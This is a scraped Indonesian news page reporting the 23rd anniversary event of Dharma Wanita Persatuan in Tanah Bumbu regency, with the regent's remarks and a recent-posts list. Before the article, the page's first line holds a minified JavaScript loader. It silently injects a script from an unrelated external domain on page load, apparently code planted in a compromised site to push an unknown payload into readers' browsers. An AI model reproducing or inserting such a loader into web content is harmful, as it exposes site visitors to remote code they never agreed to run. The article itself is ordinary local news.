(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Peringatan Puncak HUT ke-23 DWP di Tanbu, Ini Pesan Bupati Zairullah


KANALKALIMANTAN.COM, BATULICIN – Dharma Wanita Persatuan (DWP) Kabupaten Tanah Bumbu (Tanbu) menggelar meriah puncak peringatan Hari Ulang Tahun (HUT) ke-23 DWP di gedung Mahligai Bersujud Kecamatan Simpang Empat, Senin (19/12/2022).

Kegiatan tersebut mengusung tema “Membangun Perempuan Cerdas untuk Memperkuat Ketahanan Keluarga di Era Digital” dihadiri Bupati Tanah Bumbu, HM Zairullah Azhar bersama Sekretaris Daerah, H Ambo Sakka.

Bupati Zairullah berpesan melalui momentum ini bisa menjadi wadah untuk bersama merenung dan melihat, kelebihan dan juga kekurangan dalam diri, sebab dari sana seseorang akan bangkit membenahi dan memperbaiki diri menuju yang terbaik.

Bupati menambahkan bahwa tema dalam acara tersebut sangat luar biasa yang mana juga sejalan dengan Moto Kabupaten Tanah Bumbu yakni “Bersujud” yang merupakan lambang ketaatan kedekatan ketakwaan dan ketakutan kepada Allah SWT.

 

Baca juga  : Tinggal di Bawah Tenda di Alas Tanah Warga, Keluarga Slamet Terima Bantuan Home Care Wali Kota Banjarbaru

“Bersujud sekaligus menjadi lambang kecerdasan, karena ketika bersujud secara ilmiah otak manusia berada di paling bawah, yang beratnya hanya enam ons mendapatkan asupan gizi yang maha luar biasa dan insyaallah orang yang banyak sujudnya adalah orang cerdas,” ucap Zairullah.

Ketua DWP Tanah Bumbu, Hasnah Mashude Ambo Sakka menegaskan bahwa ibu yang hebat dan perempuan yang cerdas adalah penentu kualitas keluarga di dalam masyarakat.

“Melalui tema dan gerakan tersebut ia mengajak seluruh anggota DWP untuk belajar satu sama lain, guna mengasah keahlian di berbagai bidang kehidupan dan juga tidak lupa mendalami nilai-nilai Pancasila, yang menjadi landasan dan pengembangan karakter sehingga menjadi panutan di tengah keluarga,” katanya.

Puncak peringatan HUT DWP secara simbolis ditandai dengan pemotongan tumpeng, yang dilakukan oleh Penasehat 1 DWP Wahyu Windarti Zairullah bersama Penasehat 2 Suci Anisa Rusli yang diberikan kepada Bupati Tanbu dan pemotongan kue oleh Ketua DWP Hasnah Mashude Ambo untuk diberikan kepada Sekretaris Daerah.

Baca juga  : Pulau Sampah di Sungai Martapura, ‘PR’ Kota Seribu Sungai yang Selalu Berulang-ulang

Selain itu, kegiatan tersebut juga diisi dengan penampilan tari kreasi, paduan suara dari anggota DWP Tanah Bumbu, pengumuman pemenang lomba rangkaian HUT DWP sebelumnya dan pembagian doorprize untuk peserta yang berhadir.

Turut berhadir juga dalam puncak HUT DWP diantaranya Forkompinda Tanbu, pimpinan SKPD dan pejabat di lingkup Pemkab Tanbu, camat beserta lurah, ketua beserta anggota DWP unit SKPD tingkat kecamatan dan kelurahan, pimpinan perusahaan atau perbankan dan tamu undangan lainnya. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Desy Arfianty

Recent Posts

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

1 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

3 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

4 jam ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

4 jam ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

8 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

19 jam ago

This website uses cookies.